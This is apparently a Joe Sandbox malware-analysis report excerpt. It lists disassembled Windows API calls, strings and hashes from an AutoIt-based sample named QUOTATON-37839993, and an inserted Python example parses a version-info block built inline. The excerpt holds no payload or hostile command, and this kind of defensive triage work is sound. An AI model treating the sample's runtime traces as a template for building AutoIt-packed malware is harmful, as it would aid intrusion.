                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E8A964
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00E8A96D
                                                                      • SelectObject.GDI32(?,?), ref: 00E8A97A
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED
                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8AA14
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00E8AA32
                                                                      • DrawFocusRect.USER32(?,?), ref: 00E8AA3D
                                                                      • GetSysColor.USER32(00000011), ref: 00E8AA4B
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E8AA53
                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8AA67
                                                                      • SelectObject.GDI32(?,00E8A5FA), ref: 00E8AA7E
                                                                      • DeleteObject.GDI32(?), ref: 00E8AA89
                                                                      • SelectObject.GDI32(?,?), ref: 00E8AA8F
                                                                      • DeleteObject.GDI32(?), ref: 00E8AA94
                                                                      • SetTextColor.GDI32(?,?), ref: 00E8AA9A
                                                                      • SetBkColor.GDI32(?,?), ref: 00E8AAA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: c57e7f661817a579ad6aeeb4984f16f57f70bca9e96ce1fff05a25e0713c3bcf
                                                                      • Instruction ID: d6f2ca5108f53feb72e7cbdbbf08b989495f61aebca0a7e9695673dc29086d42
                                                                      • Opcode Fuzzy Hash: c57e7f661817a579ad6aeeb4984f16f57f70bca9e96ce1fff05a25e0713c3bcf
                                                                      • Instruction Fuzzy Hash: F0515E71901208EFDF109FA5DC48EAE7B79EB48320F154226F919BB2A1D7719944DB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E88AC1
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88AD2
                                                                      • CharNextW.USER32(0000014E), ref: 00E88B01
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E88B42
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E88B58
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E88B69
                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E88B86
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E88BD8
                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E88BEE
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E88C1F
                                                                      • _memset.LIBCMT ref: 00E88C44
                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E88C8D
                                                                      • _memset.LIBCMT ref: 00E88CEC
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E88D16
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E88D6E
                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00E88E1B
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E88E3D
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88E87
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E88EB4
                                                                      • DrawMenuBar.USER32(?), ref: 00E88EC3
                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00E88EEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                      • String ID: 0
                                                                      • API String ID: 1073566785-4108050209
                                                                      • Opcode ID: 5f339585261bcb1c760cf3b5e4b476df3485564018236b727eb520c7d7fca76f
                                                                      • Instruction ID: 72b5cac506194946f5df79809882a16f26187f60a82d2c1196c366abfdd6d82b
                                                                      • Opcode Fuzzy Hash: 5f339585261bcb1c760cf3b5e4b476df3485564018236b727eb520c7d7fca76f
                                                                      • Instruction Fuzzy Hash: 1DE1AF75900218AFDB20AF61CD84EEE7BB9EF04714F50919AFE1DBA190DB709984DF60
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00E849CA
                                                                      • GetDesktopWindow.USER32 ref: 00E849DF
                                                                      • GetWindowRect.USER32(00000000), ref: 00E849E6
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E84A48
                                                                      • DestroyWindow.USER32(?), ref: 00E84A74
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E84A9D
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E84ABB
                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E84AE1
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00E84AF6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E84B09
                                                                      • IsWindowVisible.USER32(?), ref: 00E84B29
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E84B44
                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E84B58
                                                                      • GetWindowRect.USER32(?,?), ref: 00E84B70
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00E84B96
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00E84BB0
                                                                      • CopyRect.USER32(?,?), ref: 00E84BC7
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00E84C32
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
                                                                      • Instruction ID: 7247bae26da6d1f600ff94e3b3499b11d8b9b2a44e318f436a8588dd23f87482
                                                                      • Opcode Fuzzy Hash: fba16eae812ce2cc4cbbdc7b3c9155c4c459470d3507680dcd74f392ec244e35
                                                                      • Instruction Fuzzy Hash: D9B17BB1604341AFDB04EF65C844B6ABBE4FF84314F009A1CF59DAB2A2D771E845CB95
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E644AC
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E644D2
                                                                      • _wcscpy.LIBCMT ref: 00E64500
                                                                      • _wcscmp.LIBCMT ref: 00E6450B
                                                                      • _wcscat.LIBCMT ref: 00E64521
                                                                      • _wcsstr.LIBCMT ref: 00E6452C
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E64548
                                                                      • _wcscat.LIBCMT ref: 00E64591
                                                                      • _wcscat.LIBCMT ref: 00E64598
                                                                      • _wcsncpy.LIBCMT ref: 00E645C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 699586101-1459072770
                                                                      • Opcode ID: f192bb51209212a7413b2355ac955c95d6e5df525c1498e139f2b936fb7dede4
                                                                      • Instruction ID: 3f3d85afe2672007a87b7c63c533ac0712aa2523b21ba456f6e2eb8cac35adc9
                                                                      • Opcode Fuzzy Hash: f192bb51209212a7413b2355ac955c95d6e5df525c1498e139f2b936fb7dede4
                                                                      • Instruction Fuzzy Hash: AA41E4719403147BDB14BA74EC43EFF77ECDF41750F00206AFA09B61C2EA359A0196A6
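The function listed above (00E644AC) is the AutoIt runtime's version-info lookup: GetFileVersionInfoSizeW and GetFileVersionInfoW fetch the VS_VERSIONINFO block, VerQueryValueW is asked for \VarFileInfo\Translation, a StringFileInfo\<lang><codepage>\<field> path is assembled with _wcscat, and the fixed version is printed as %u.%u.%u.%u. The following is an added example, not code from the Joe Sandbox report, from AutoIt or from the sample: it reproduces that lookup order as a pure-Python parser of a VS_VERSIONINFO block so it runs without VERSION.dll, and works on a blob constructed inline rather than on bytes from QUOTATON-37839993.exe. All function names are mine; treating "04090000" as the fallback language/codepage when no Translation entry exists, and "DefaultLangCodepage" as the name that returns that string, is my reading of the strings in the listing, not something the report states.

```python
"""Added example (not report or sample code): the lookup order of the function at
00E644AC, reproduced as a pure-Python VS_VERSIONINFO parser so it runs without VERSION.dll."""
import struct
from collections import namedtuple

Node = namedtuple("Node", "key wtype value children end")
FIXED_FMT = "<13I"            # VS_FIXEDFILEINFO: 13 DWORDs, 52 bytes
FIXED_SIG = 0xFEEF04BD
DEFAULT_LANGCP = "04090000"   # string from the listing; assumed fallback when Translation is missing

def _pad4(n):
    return (n + 3) & ~3

def build_node(key, value=b"", wtype=0, children=()):
    """wLength, wValueLength, wType, UTF-16 key, pad, value, pad, children (4-byte aligned)."""
    out = bytearray(6)
    out += (key + "\0").encode("utf-16-le")
    out += b"\0" * (_pad4(len(out)) - len(out))
    out += value
    out += b"\0" * (_pad4(len(out)) - len(out))
    for child in children:
        out += child
        out += b"\0" * (_pad4(len(out)) - len(out))
    vlen = len(value) // 2 if wtype == 1 else len(value)   # text values are counted in WCHARs
    struct.pack_into("<HHH", out, 0, len(out), vlen, wtype)
    return bytes(out)

def parse_node(buf, off=0):
    """Parse the node at buf[off:] and, recursively, its children."""
    wlen, vlen, wtype = struct.unpack_from("<HHH", buf, off)
    if wlen < 6 or off + wlen > len(buf):
        raise ValueError("bad node length at offset %d" % off)
    end = off + wlen
    k = off + 6
    while buf[k:k + 2] != b"\0\0":          # walk WCHAR by WCHAR to the terminator
        k += 2
        if k + 2 > end:
            raise ValueError("unterminated key at offset %d" % off)
    key = bytes(buf[off + 6:k]).decode("utf-16-le")
    pos = _pad4(k + 2)
    vbytes = vlen * 2 if wtype == 1 else vlen
    value = bytes(buf[pos:pos + vbytes])
    pos = _pad4(pos + vbytes)
    children = []
    while pos + 6 <= end:
        child = parse_node(buf, pos)
        children.append(child)
        pos = _pad4(child.end)
    return Node(key, wtype, value, children, end)

def query_value(root, subblock):
    """VerQueryValueW stand-in: follow a backslash-separated path; "\\" alone yields the root."""
    node = root
    for part in [p for p in subblock.split("\\") if p]:
        node = next((c for c in node.children if c.key.lower() == part.lower()), None)
        if node is None:
            return None
    return node

def file_get_version(blob, field=""):
    """No field: fixed version as %u.%u.%u.%u; "DefaultLangCodepage": the <lang><cp> string;
    any other name: the StringFileInfo entry under that table, or "" when absent."""
    root = parse_node(blob)
    if root.key != "VS_VERSION_INFO" or len(root.value) != struct.calcsize(FIXED_FMT):
        raise ValueError("not a VS_VERSIONINFO block")
    if not field:
        fixed = struct.unpack(FIXED_FMT, root.value)
        if fixed[0] != FIXED_SIG:
            raise ValueError("bad VS_FIXEDFILEINFO signature")
        ms, ls = fixed[2], fixed[3]                          # dwFileVersionMS, dwFileVersionLS
        return "%u.%u.%u.%u" % (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)
    trans = query_value(root, "\\VarFileInfo\\Translation")
    if trans is not None and len(trans.value) >= 4:
        lang, cp = struct.unpack_from("<HH", trans.value, 0)  # first (language, codepage) pair
        langcp = "%04x%04x" % (lang, cp)
    else:
        langcp = DEFAULT_LANGCP
    if field == "DefaultLangCodepage":
        return langcp
    node = query_value(root, "\\StringFileInfo\\%s\\%s" % (langcp, field))
    if node is None or node.wtype != 1:
        return ""
    return node.value.decode("utf-16-le").rstrip("\0")

def sample_blob(with_translation=True):
    """Constructed VS_VERSIONINFO (not from QUOTATON-37839993.exe): 3.3.14.5, one 040904b0 table."""
    fixed = struct.pack(FIXED_FMT, FIXED_SIG, 0x00010000, (3 << 16) | 3, (14 << 16) | 5,
                        (3 << 16) | 3, (14 << 16) | 5, 0x3F, 0, 0x40004, 1, 0, 0, 0)
    def text(name, s):
        return build_node(name, (s + "\0").encode("utf-16-le"), wtype=1)
    table = build_node("040904b0", children=[text("CompanyName", "Example Corp"),
                                             text("FileVersion", "3.3.14.5")])
    children = [build_node("StringFileInfo", children=[table])]
    if with_translation:                  # omit VarFileInfo to exercise the 04090000 fallback
        children.append(build_node("VarFileInfo", children=[
            build_node("Translation", struct.pack("<HH", 0x0409, 0x04B0))]))
    return build_node("VS_VERSION_INFO", fixed, children=children)
```

Calling file_get_version(sample_blob()) gives "3.3.14.5", the "DefaultLangCodepage" field gives "040904b0", and "CompanyName" gives "Example Corp". With sample_blob(False) the Translation query fails, the fallback "04090000" is used, and "CompanyName" comes back empty because no string table carries that key: the point for triage is that a "04090000" seen in a string dump can be a hard-coded fallback rather than a language/codepage observed in any file, and that only the first Translation pair is consulted.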
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028BC
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00E028C4
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E028EF
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00E028F7
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E0291C
                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02939
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E02949
                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E0297C
                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E02990
                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00E029AE
                                                                      • GetStockObject.GDI32(00000011), ref: 00E029CA
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E029D5
                                                                        • Part of subcall function 00E02344: GetCursorPos.USER32(?), ref: 00E02357
                                                                        • Part of subcall function 00E02344: ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                                                                        • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000001), ref: 00E02399
                                                                        • Part of subcall function 00E02344: GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00E01256), ref: 00E029FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: 21b52871bc56f6e6dd7b93bbf4316b4647b7cc0435898ae9c1b7627849010c8c
                                                                      • Instruction ID: 89ed838d1fd8f78d8290c89260d0bc1466d724b705e2fa5d4aa4a039c0c3254f
                                                                      • Opcode Fuzzy Hash: 21b52871bc56f6e6dd7b93bbf4316b4647b7cc0435898ae9c1b7627849010c8c
                                                                      • Instruction Fuzzy Hash: 41B16C71A0020AEFDB14DFA9DC49BAE7BB4FB48314F105129FA15B62E0DB74E895CB50
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E5A47A
                                                                      • __swprintf.LIBCMT ref: 00E5A51B
                                                                      • _wcscmp.LIBCMT ref: 00E5A52E
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E5A583
                                                                      • _wcscmp.LIBCMT ref: 00E5A5BF
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E5A5F6
                                                                      • GetDlgCtrlID.USER32(?), ref: 00E5A648
                                                                      • GetWindowRect.USER32(?,?), ref: 00E5A67E
                                                                      • GetParent.USER32(?), ref: 00E5A69C
                                                                      • ScreenToClient.USER32(00000000), ref: 00E5A6A3
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E5A71D
                                                                      • _wcscmp.LIBCMT ref: 00E5A731
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E5A757
                                                                      • _wcscmp.LIBCMT ref: 00E5A76B
                                                                        • Part of subcall function 00E2362C: _iswctype.LIBCMT ref: 00E23634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                      • String ID: %s%u
                                                                      • API String ID: 3744389584-679674701
                                                                      • Opcode ID: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
                                                                      • Instruction ID: e34047eb30d87368814e15adbfb3c1f2a0c414c5b5720e4997ade4d2c8f00faf
                                                                      • Opcode Fuzzy Hash: 897c0167f8256af14baf29d9e0c6bbee88571c5e94f208b637c3b90a3090a8c7
                                                                      • Instruction Fuzzy Hash: 25A1B571204206AFD715DF60C884FAAB7E8FF44355F085A3AFD99E2150DB30E959CB92
                                                                      APIs
                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 00E5AF18
                                                                      • _wcscmp.LIBCMT ref: 00E5AF29
                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E5AF51
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E5AF6E
                                                                      • _wcscmp.LIBCMT ref: 00E5AF8C
                                                                      • _wcsstr.LIBCMT ref: 00E5AF9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5AFD5
                                                                      • _wcscmp.LIBCMT ref: 00E5AFE5
                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E5B00C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E5B055
                                                                      • _wcscmp.LIBCMT ref: 00E5B065
                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 00E5B08D
                                                                      • GetWindowRect.USER32(00000004,?), ref: 00E5B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                      • String ID: @$ThumbnailClass
                                                                      • API String ID: 1788623398-1539354611
                                                                      • Opcode ID: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
                                                                      • Instruction ID: 39292d5d59e0c7a423fbbb5705f7107e5de4689d5a312da827dee2ab516fa679
                                                                      • Opcode Fuzzy Hash: 1a763cf309c917c05ffbded5a52ab9e721191981f9e1568eaafc206e595263aa
                                                                      • Instruction Fuzzy Hash: BC81C2711083059FDB04DF10C981FAA77D8EF84319F18A96AFD89AA091DB34DD8DCBA1
APIs
  • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
• DragQueryPoint.SHELL32(?,?), ref: 00E8C627
  • Part of subcall function 00E8AB37: ClientToScreen.USER32(?,?), ref: 00E8AB60
  • Part of subcall function 00E8AB37: GetWindowRect.USER32(?,?), ref: 00E8ABD6
  • Part of subcall function 00E8AB37: PtInRect.USER32(?,?,00E8C014), ref: 00E8ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00E8C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00E8C6BE
• _wcscat.LIBCMT ref: 00E8C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00E8C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E8C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 00E8C757
• DragFinish.SHELL32(?), ref: 00E8C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00E8C851
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
• API String ID: 169749273-730855631
• Opcode ID: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
• Instruction ID: eb1086b51f16f652f9881be8af5e38f7aaf4bd145b9a7f8a6750b86cfb09d1b9
• Opcode Fuzzy Hash: 76fee54790c7af3b6ec76445b3317471bb9d0a217e5a33bc6a5f90cef8a1f2e4
• Instruction Fuzzy Hash: 32618071108300AFC705EF64CC85D9FBBE8EFC9710F50192EF599A21A1DB31A949CB62
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 9586849ab91b114d892af000cc794a1e95abf306fbc3e410f01574f54d6ec5a8
• Instruction ID: 7366a5ba8a6c4ceacab5cd73ea07a400ed03758c53f684f4fc36823a99e74595
• Opcode Fuzzy Hash: 9586849ab91b114d892af000cc794a1e95abf306fbc3e410f01574f54d6ec5a8
• Instruction Fuzzy Hash: 2631A471A48309ABDB10FA60DE03EEFB7E4AF10715F643929F881714D1EF616F488A52
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 00E75013
• LoadCursorW.USER32(00000000,00007F00), ref: 00E7501E
• LoadCursorW.USER32(00000000,00007F03), ref: 00E75029
• LoadCursorW.USER32(00000000,00007F8B), ref: 00E75034
• LoadCursorW.USER32(00000000,00007F01), ref: 00E7503F
• LoadCursorW.USER32(00000000,00007F81), ref: 00E7504A
• LoadCursorW.USER32(00000000,00007F88), ref: 00E75055
• LoadCursorW.USER32(00000000,00007F80), ref: 00E75060
• LoadCursorW.USER32(00000000,00007F86), ref: 00E7506B
• LoadCursorW.USER32(00000000,00007F83), ref: 00E75076
• LoadCursorW.USER32(00000000,00007F85), ref: 00E75081
• LoadCursorW.USER32(00000000,00007F82), ref: 00E7508C
• LoadCursorW.USER32(00000000,00007F84), ref: 00E75097
• LoadCursorW.USER32(00000000,00007F04), ref: 00E750A2
• LoadCursorW.USER32(00000000,00007F02), ref: 00E750AD
• LoadCursorW.USER32(00000000,00007F89), ref: 00E750B8
• GetCursorInfo.USER32(?), ref: 00E750C8
Memory Dump Source
